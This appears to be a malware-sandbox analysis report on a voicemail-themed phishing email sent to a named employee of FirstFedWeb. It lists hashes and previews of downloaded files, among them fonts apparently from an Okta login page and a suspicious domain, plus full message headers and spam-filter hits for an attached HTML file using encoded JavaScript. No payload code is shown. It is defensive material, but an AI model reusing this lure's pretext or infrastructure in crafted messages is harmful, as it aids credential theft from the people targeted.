                                                    SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                    SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/ijtRXITFO80Q6ShrbKw43Z3oNRnoTP3BjsbsYtCixyacXfPlETdF6Gskm04UTLN24CqgMdaXSef210
                                                    Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                    Category:downloaded
                                                    Size (bytes):28000
                                                    Entropy (8bit):7.99335735457429
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                    SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                    SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                    SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/rs6zumbH67bEjS346bwx33
                                                    Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 20416, version 2.197
                                                    Category:downloaded
                                                    Size (bytes):20416
                                                    Entropy (8bit):7.99050164976329
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:D99A7377DABB55772CA9F986B0A04B57
                                                    SHA1:2B5FCD8431953C44E410D0489899E74F6D2CFECC
                                                    SHA-256:AFFDBA1620552B12A1A8A04467136AEB408C03FA337D20E9C38374D682D4D149
                                                    SHA-512:CB80EBC6424029C45E86DDF6C18EB43284605678EDE88119301CC6493C21E282CACE48FD849FC14E5D73C6AECF83645CC3A58051D5D8E22197E09912A41E3130
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://ok4static.oktacdn.com/assets/loginpage/font/assets/proximanova-reg-webfont.353416ed0ff540352235.woff2
                                                    Preview:wOF2......O..........OS........................?FFTM..2..,....`..b.@..e.....|..h.6.$..*..X.. .....n..p?webf....5x.(-....O.)G......G"............!c...toeA0......H.h....rM...I....h.k........^F6F#.f.._....P.E..mz..`p..|4...eG..:c ........e.|...:?.......I.$.N{VR.....wP........N.h.IA,k.!D..Y.p..8.B.eH..~...W.>.%.`.FK..e...[..?L4S]X.L...T`a....ff],.+...;..1.......`......D.V...4.T9t*...U.A6).......?.....b.T........+...w..8....y ..7eT.....]{....'P..`.bn.......FR..(H.H.(...`507..\..[.........L.Y....)3HK..Bi.r_.+...T....w.M...=.0C...ev._..E.}F.01*..Q..(....9......a.H3.8j...u.(..X.-p,.9..B.s..n..}oY.d.+{\........}.c...X.....,.,s.+.O......V.D.....}......$'....S6.V.c.4.s..*]..v...juo..=.r@...........l.....d..( ;@d..j..E....K..e..l.4e.OU...@X...Y..u)....u..j......H...2..^Q.......(i.".]J....1V...X....1...r@...\.%....mQCSLQ.(..C.1.........[...(o+oJ..%.#...1...o...4.......e..~^}~....K....t.2.2t..8.q....<=G.{......:...{....Q1v..Q.\...#.N.......o.e..\].1)Q
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65531)
                                                    Category:downloaded
                                                    Size (bytes):81159
                                                    Entropy (8bit):6.035300129199013
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2B450DA646DAF725FC2E0D975A1507FD
                                                    SHA1:DD562A04DD65F29AB05CCDC19A4CFC339BC31351
                                                    SHA-256:0E8D17E6A02EEF1F9ABB3EE68F29E16E53A7568727C53CE1D976692F88F5167A
                                                    SHA-512:D86160F174ACBF21E0A8B9B3F522F859ABCD042B5A96956ED93A65FA6AA6B9A64FDE86C042DC59213EF1DC6DBC3B8636C1B94D4509ED61427C944A0A507ABCF0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.google.com/async/ddljson?async=ntp:2
                                                    Preview:)]}'.{"ddljson":{"alt_text":"Paris Games Begin! ","dark_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAfQAAADICAMAAAApx+PaAAAC/VBMVEUAAABeTypdTh81M3wuMXsyMnofKnkgK3kfKnkxMn1bTSIvMXofK3ogLHskLnoKFW5eTxJfUBICCGEzQJNudrZIS5AiLX1eTxJfTxJeTxJeTxFaWZb///++v72Ih4GpqKTJysqYnc6gnb7a2e20tdiEjMU/PYwaJHJeTxFxZit9dTpVU04AAAAMER8kIAR1XkGonn/6+e7o6virqclhUhSzq479/Po7OoWPjbc2S7gkJ1oCBEwEBg9PQCuUlI04MSRwbGrQ0dqgl3K8tp7FwateTxH18v14keEQDQUrOYw5SKZGYdYREGEaFhDp6eMlIyNGQ0FkXlvE0vleTxLRzrzy7NHg0IzWxG7Wv2Hv5b9dThLd3NOdnpt9d3U0NTosJ2gVHF2zs6+Bfau/wOH28uIYIWpeTxKHc0zMrz3EoyM+ZqYmKnJraJ8mKYcdJGrEk53m2J/IqjOdkWzKwYJ0dosXHokXG0Xxqazji5UpMHpSWW+OgmGTuvlPhdc/WsZLbOtemfgOFjS4d4Grjh7Os0kuMHjSulS9nSEwMINsXBafhBxUjeFnWBh5Zhe0liC6nSzsyp/GoXCad0heTxGSehuFcBpFcbdASFnSqXKnglKzjlu/mmnesni4lGViUTMfH1H//7mJZTPv5Z9JQA82LwXzwID//s7cklY8Nnr99qdzYRePh0J1YyO3q1nWuZSwliynix0zM3rq00/97Xp6bDnt3a6IcRgrMHqclVDdzHfHpyrDumT/yOH7vsrcp65AOH2Og1c5N4AyMnjk4to4NXvs3fT///89iOk4etv///82M3pFOnqBaxc5NXxYk+1LfssnRG////5COXy+tGFmpv+tpFU
                                                    File type:RFC 822 mail, ASCII text, with very long lines (347), with CRLF line terminators
                                                    Entropy (8bit):6.019409701025605
                                                    TrID:
                                                    • E-Mail message (Var. 5) (54515/1) 100.00%
                                                    File name:phish_alert_iocp_v1.4.48 (43).eml
                                                    File size:20'315 bytes
                                                    MD5:ad2ce3de882e4e5c78726dde87f25ca7
                                                    SHA1:88691243762a80426a098e155bd37cd0481a1b24
                                                    SHA256:12a4f2b878966cb23794bb6546378525125f92751e4fa4d4ee18126828fab624
                                                    SHA512:d0aad00679544e93c34b018dab2ed5c0933544afd752352740c8cbe498205640ef4d587ec4e2f07a4297400e08987967e599c5d009d1695a1e772744c6b19e87
                                                    SSDEEP:384:eTo4cPrEPuOwqnzWlnwWIG69jtLYkabsa/t5fqkl59Tj:eTo4cYPuOwQzWl2v9jtobd/tB9Tj
                                                    TLSH:B0924CE05D725038F9E223DD2A567A4E2472359F9DF3E9D0B2D462420DCB0BB87157C6
                                                    File Content Preview:Received: from SA0PR22MB3487.namprd22.prod.outlook.com.. (2603:10b6:806:1bd::14) by MN0PR22MB5442.namprd22.prod.outlook.com with.. HTTPS; Wed, 28 Aug 2024 17:11:09 +0000..ARC-Seal: i=2; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=pass;.. b=Rjah7
                                                    Subject:Missed Call: VM-Transcript: Caller Left (2) CALL>MSG (00:00:39Secs) - Firstfedweb-VM
                                                    From:AUDIO SERVICES <Firstfedweb-support4914127962eb34801d133232ae00b134@pvnavigate.co.jp>
                                                    To:Sandy Schultz <SSchultz@FirstFedWeb.com>
                                                    Cc:
                                                    BCC:
                                                    Date:Wed, 28 Aug 2024 00:32:14 -0700
                                                    Communications:
                                                    • [EXTERNAL EMAIL: Take caution with links and attachments. ] This message was sent by your voice mail system. Message received on 08/28/2024 04:32:14 pm
                                                    Attachments:
                                                    • VM-20240828-03940.html
                                                    Key Value
                                                    ReceivedWed, 28 Aug 2024 10:11:09 -0700
                                                    ARC-Seali=1; a=rsa-sha256; d=silversky.com; s=silversky-20150623192408; t=1724864877; cv=none; b=keUsnHjp0qNxWJggGeQPFUcKl6LDbcaE3N0sc67KCych1bE+a0n023mXtxcdaskCalZyZspmMejA2oCZrdkvu1cvvSVEM20woSI5/pq6IJYuKuu1j8A1hdRP7/anKxTh8c1z3JSeMAbFyjwqyag7K4t32XUoK/Ga/0e/4+8mYzM=
                                                    ARC-Message-Signaturei=1; a=rsa-sha256; d=silversky.com; s=silversky-20150623192408; t=1724864877; c=relaxed/simple; bh=UQowEvZKRrAQT8fN3MQ83nv3ZD0U/S7kCJkdokhZqH0=; h=To:Subject:Date:From; b=FQOtCqu39A9mXGxn1FH2e9ck1jQjqn9C2Ax3l0ew8zBxTtZkH9vVofAUgF/T6clIl3pHZ4sSvirKc47+Xu8IuFYQuKcfnZrE/UVup9ij8VAO1sqCW5Kj/DEstv2F0uKlCcWvfGSkOhO0h7tGbIvcZg9OV6RH7RXIM3Vgc5jA9Ps=
                                                    ARC-Authentication-Resultsi=1; gwsin.silversky.com; dmarc=none policy.dmarc=none header.from=pvnavigate.co.jp; dkim=pass header.d=pvnavigate.co.jp; spf=pass smtp.mailfrom=pvnavigate.co.jp; arc=none smtp.remote-ip=162.43.104.54
                                                    authentication-resultsspf=softfail (sender IP is 165.212.64.14) smtp.mailfrom=pvnavigate.co.jp; dkim=pass (signature was verified) header.d=pvnavigate.co.jp;dmarc=bestguesspass action=none header.from=pvnavigate.co.jp;compauth=pass reason=109
                                                    received-spfSoftFail (protection.outlook.com: domain of transitioning pvnavigate.co.jp discourages use of 165.212.64.14 as permitted sender)
                                                    X-USANET-Receivedfrom emd3.mbox.net [165.212.64.10] by gws5.mbox.net via mtad (GIT.BUILD.5.0.3133) with ESMTP id 031CHbHho8384Ms5; Wed, 28 Aug 2024 07:33:14 -0000
                                                    X-USANET-TAP-Score0
                                                    X-BAEAI-Quarantine-Release-Spam_AV-Userunknown
                                                    Authentication-Results-Originalgwsin.silversky.com; dmarc=none policy.dmarc=none header.from=pvnavigate.co.jp; dkim=pass header.d=pvnavigate.co.jp; spf=pass smtp.mailfrom=pvnavigate.co.jp; arc=none smtp.remote-ip=162.43.104.54
                                                    X-USANET-Routed100 IN-RELAY R:gwsin-int:625
                                                    X-USANET-GWS2-Servicegwsdin-tap preclick-never
                                                    X-USANET-GWS2-Tenantfirstfedweb.com
                                                    X-USANET-GWS2-TagidFF1001
                                                    X-USANET-GWS2-MailFromDnsResultDnsFound
                                                    X-USANET-GWS2-SecurityTLSv1.2;ECDHE-RSA-AES256-GCM-SHA384
                                                    X-USANET-Source162.43.104.54 IN Firstfedweb-support4914127962eb34801d133232ae00b134@pvnavigate.co.jp sv14653.xserver.jp TLS
                                                    X-USANET-MsgIdXID037CHbHho0008Xd3
                                                    X-BAEAI-Trust-Score59
                                                    X-BAEAI-Trust-ReasonsSNDRAUTH; SNDRNEW; DOMRARE,pvnavigate.co.jp; RCPTVIP; ADRNMFRG,AUDIO SERVICES=C2=AE,firstfedweb-support4914127962eb34801d133232ae00b134@pvnavigate.co.jp;
                                                    X-Virus-Statusclean(F-Secure/fsigk_smtp/550/virusgw14004.xserver.jp)
                                                    dkim-signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=pvnavigate.co.jp; s=default; t=1724830334; bh=E427SotImrWP9lDN58i7GrsqAWX9Yx1ZYkTqKOKpsps=; h=To:Subject:Date:From:From; b=uU79atv3TBuKPcLbiCnqmbsxgjHd80WljLW9iuIJTThPUnTM4yTbrh1VnBVvetWky aFJ7qyySlEWgC/jBkg7scPtNqkli87O3tbh8IjK85eTjNleWCg604q1RYjhclKDytF XXPuGPYvp2zzpDcNuWUM7L5oUx2tq3d+sdwMNKtS87KwDdp6n+bitIH4WTmcyZFspQ xsQVvSS72UBeH4DGhBke6tzpuRRfxEU8ouj9rzPXMiAM9pLDYYUSlx0G2QNTj+r10F LXi9qBxPyVXy3PRdVZBMZY1F/64yfRxBIPNP3yb5rEvsa/nrh3UmKGh9GF9qY4phJO w7J4n1jrKH0/g==
                                                    X-Cloudmark-Trackerv=2.4 cv=Jbh3rlKV c=1 sm=1 tr=0 ts=66ced2bc cx=a_idp_d a=Be4SOgOPD5fGgfmMcKNnaA==:117 a=Be4SOgOPD5fGgfmMcKNnaA==:17 a=yoJbH4e0A30A:10 a=M51BFTxLslgA:10 a=tZOw-plyVOEA:10 a=r77TgQKjGQsHNAKrUKIA:9 a=UMnDuPKKnIJmgnzINcAA:9 a=CjuIK1q_8ugA:10 a=Isfjvi9oAAAA:8 a=8ruSGpomTxRNtYvTDSQA:9 a=f8FEhdGO8RFqD/MZnE7VBFbGytM=:19 a=_W_S_7VecoQA:10 a=L03L2QfmqWoA:10 a=1WNtSb5ECZgA:10 a=YMDq6aD3OOkA:10 a=_C6zaqPeZVUA:10 a=Pr9_uK91Di_oKfpH8e0d:22 a=vjMFaxdTzmpZwn4RbnHY:22
                                                    X-USANET-SpamSspam
                                                    X-LASED-VersionAntispam-Engine: 5.1.4, AntispamData: 2024.8.28.70920
                                                    X-LASED-SpamProbability0.562177
                                                    X-LASED-SpamConfirmed
                                                    X-LASED-HitsBODYTEXTH_SIZE_10000_LESS 0.000000, BODYTEXTP_SIZE_3000_LESS 0.000000, BODYTEXTP_SIZE_400_LESS 0.000000, BODY_SIZE_2000_2999 0.000000, BODY_SIZE_5000_LESS 0.000000, BODY_SIZE_7000_LESS 0.000000, CTE_8BIT 0.000000, CTYPE_APP_OS_HTML_ATTACHED 0.500000, CTYPE_APP_OS_HTML_ATTACHED_JS_DEC 2.000000, DKIM_ALIGNS 0.000000, DKIM_SIGNATURE 0.000000, HTML_ATTACHED 0.000000, JAVASCRIPT_CODE_X2 0.000000, JAVASCRIPT_DECODE 0.000000, JAVASCRIPT_DOCUMENT_WRITE 0.500000, JS_ATOB 0.500000, NO_URI_FOUND 0.000000, NO_URI_HTTPS 0.000000, RCPT_SPOOF_DODGY_JS 2.000000, RCVD_TLD_JP 0.000000, RCVD_TZ_JAPANESE 0.000000, SCRIPT_ATTACHED 0.000000, SENDER_NO_AUTH 0.000000, TO_DOMAIN_IN_FROM_NOT_SAME 0.000000, __ATTACHMENT_NOT_IMG 0.000000, __ATTACHMENT_SIZE_0_10K 0.000000, __ATTACH_CTE_BASE64 0.000000, __CT 0.000000, __CTE 0.000000, __CTYPE_HAS_BOUNDARY 0.000000, __CTYPE_MULTIPART 0.000000, __CTYPE_MULTIPART_MIXED 0.000000, __DKIM_ALIGNS_1 0.000000, __DKIM_ALIGNS_2 0.000000, __FROM_ACC_ENDS_IN_DIGIT 0.000000, __FROM_NAME_NOT_IN_ADDR 0.000000, __FROM_UTF_Q 0.000000, __FROM_VOICEMAIL 0.000000, __FUR_HEADER 0.000000, __HAS_ATTACHMENT 0.000000, __HAS_ATTACHMENT1 0.000000, __HAS_ATTACHMENT2 0.000000, __HAS_FROM 0.000000, __HAS_MSGID 0.000000, __HEADER_ORDER_FROM 0.000000, __HTML_ATTACHED 0.000000, __HTML_ATTACHED_JS 0.000000, __HTML_EXT_ATTACHED 0.000000, __HTML_EXT_ATTACHED1 0.000000, __ID_RETURN_PATH 0.000000, __JS_ATOB 0.000000, __JS_DOCUMENT 0.000000, __JS_LOCATION 0.000000, __JS_REPLACE 0.000000, __JS_VARIABLE 0.000000, __MIME_ATTACHMENT_1_N 0.000000, __MIME_ATTACHMENT_N_2 0.000000, __MIME_BOUND_B1_HEX 0.000000, __MIME_TEXT_H 0.000000, __MIME_TEXT_H1 0.000000, __MIME_TEXT_H2 0.000000, __MIME_TEXT_P 0.000000, __MIME_TEXT_P1 0.000000, __MIME_TEXT_P2 0.000000, __MIME_VERSION 0.000000, __MSGID_32HEX 0.000000, __OCTET_STREAM_ATTACHED 0.000000, __PART_TYPE_HTML 0.000000, __PART_TYPE_HTML_JS 0.000000, __RCVD_POSTFIX_UID 0.000000, __SANE_MSGID 0.000000, __SPEAR_FROM_NAME 0.000000, __SUBJ_VOICEMAIL 0.000000, __TO_HOST_IN_FROM 0.000000, __TO_MALFORMED_2 0.000000, __TO_NO_NAME 0.000000, __URI_NO_MAILTO 0.000000
                                                    X-LASED-ImpersonationFalse
                                                    X-Sophos-Tracker0.562177 876b308e4d34a4f95c7c1dc8521bb13d53eb20fa
                                                    X-BAEAI-Source-GeoIP"JP" "Tokyo" "Hyakunincho"
                                                    X-BAEAI-SPFPASS
                                                    X-BAEAI-DKIMPASS
                                                    X-BAEAI-DMARCabsent
                                                    X-SilverSky-ARCnone
                                                    X-BAEAI-Authentication-Ratingstrong
                                                    X-BAEAI-Trust-Levelamber
                                                    Return-Path Firstfedweb-support4914127962eb34801d133232ae00b134@pvnavigate.co.jp
                                                    X-MS-Exchange-Organization-ExpirationStartTime28 Aug 2024 17:07:59.1487 (UTC)
                                                    X-MS-Exchange-Organization-ExpirationStartTimeReasonOriginalSubmit
                                                    X-MS-Exchange-Organization-ExpirationInterval1:00:00:00.0000000
                                                    X-MS-Exchange-Organization-ExpirationIntervalReasonOriginalSubmit
                                                    X-MS-Exchange-Organization-Network-Message-Id 7be4e91d-70c6-4f5b-f42d-08dcc783f7c7
                                                    X-EOPAttributedMessage0
                                                    X-EOPTenantAttributedMessage3778f0b2-789a-4d43-b25e-d4fe25a4c3c0:0
                                                    X-MS-Exchange-Organization-MessageDirectionalityIncoming
                                                    x-ms-publictraffictypeEmail
                                                    X-MS-TrafficTypeDiagnostic CO1PEPF000066EC:EE_|SA0PR22MB3487:EE_|MN0PR22MB5442:EE_
                                                    x-ms-exchange-organization-authsource CO1PEPF000066EC.namprd05.prod.outlook.com
                                                    x-ms-exchange-organization-authasAnonymous
                                                    X-MS-Office365-Filtering-Correlation-Id 7be4e91d-70c6-4f5b-f42d-08dcc783f7c7
                                                    X-MS-Exchange-AtpMessagePropertiesSA|SL
                                                    X-MS-Exchange-Organization-SCL-1
                                                    X-MS-Exchange-Organization-BypassClutter$true
                                                    X-Microsoft-Antispam BCL:0;ARA:13230040|41022699024|82310400026|11032799012|20132699015;
                                                    x-forefront-antispam-report CIP:165.212.64.14;CTRY:US;LANG:en;SCL:-1;SRV:;IPV:NLI;SFV:NSPM;H:postin01.mbox.net;PTR:postin01.mbox.net;CAT:NONE;SFS:(13230040)(41022699024)(82310400026)(11032799012)(20132699015);DIR:INB;
                                                    X-MS-Exchange-CrossTenant-OriginalArrivalTime28 Aug 2024 17:07:58.9143 (UTC)
                                                    X-MS-Exchange-CrossTenant-Network-Message-Id 7be4e91d-70c6-4f5b-f42d-08dcc783f7c7
                                                    X-MS-Exchange-CrossTenant-Id3778f0b2-789a-4d43-b25e-d4fe25a4c3c0
                                                    X-MS-Exchange-CrossTenant-AuthSource CO1PEPF000066EC.namprd05.prod.outlook.com
                                                    X-MS-Exchange-CrossTenant-AuthAsAnonymous
                                                    X-MS-Exchange-CrossTenant-FromEntityHeaderInternet
                                                    X-MS-Exchange-Transport-CrossTenantHeadersStampedSA0PR22MB3487
                                                    X-MS-Exchange-Transport-EndToEndLatency00:03:10.1342477
                                                    X-MS-Exchange-Processed-By-BccFoldering15.20.7897.027
                                                    X-Microsoft-Antispam-Mailbox-Delivery ucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
                                                    X-Microsoft-Antispam-Message-Info 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
                                                    x-ms-exchange-organization-originalclientipaddress165.212.64.14
                                                    x-ms-exchange-organization-originalserveripaddress10.167.249.8
                                                    X-Priority3
                                                    X-MSMail-PriorityNormal
                                                    Thread-IndexAQHa+W1GA1eSkDy3c0Gl9M/WeTIskQ==
                                                    Message-ID<64311010d74117872fcced1108c1d9f8@pvnavigate.co.jp>
                                                    FromAUDIO SERVICES <Firstfedweb-support4914127962eb34801d133232ae00b134@pvnavigate.co.jp>
                                                    ToSandy Schultz <SSchultz@FirstFedWeb.com>
                                                    SubjectMissed Call: VM-Transcript: Caller Left (2) CALL>MSG (00:00:39Secs) - Firstfedweb-VM
                                                    DateWed, 28 Aug 2024 00:32:14 -0700
                                                    MIME-Version1.0
                                                    Content-typeMultipart/related; charset="iso-8859-1"; boundary="00B0FEED_message_boundary"
                                                    Content-DescriptionMultipart message

                                                    Icon Hash:46070c0a8e0c67d6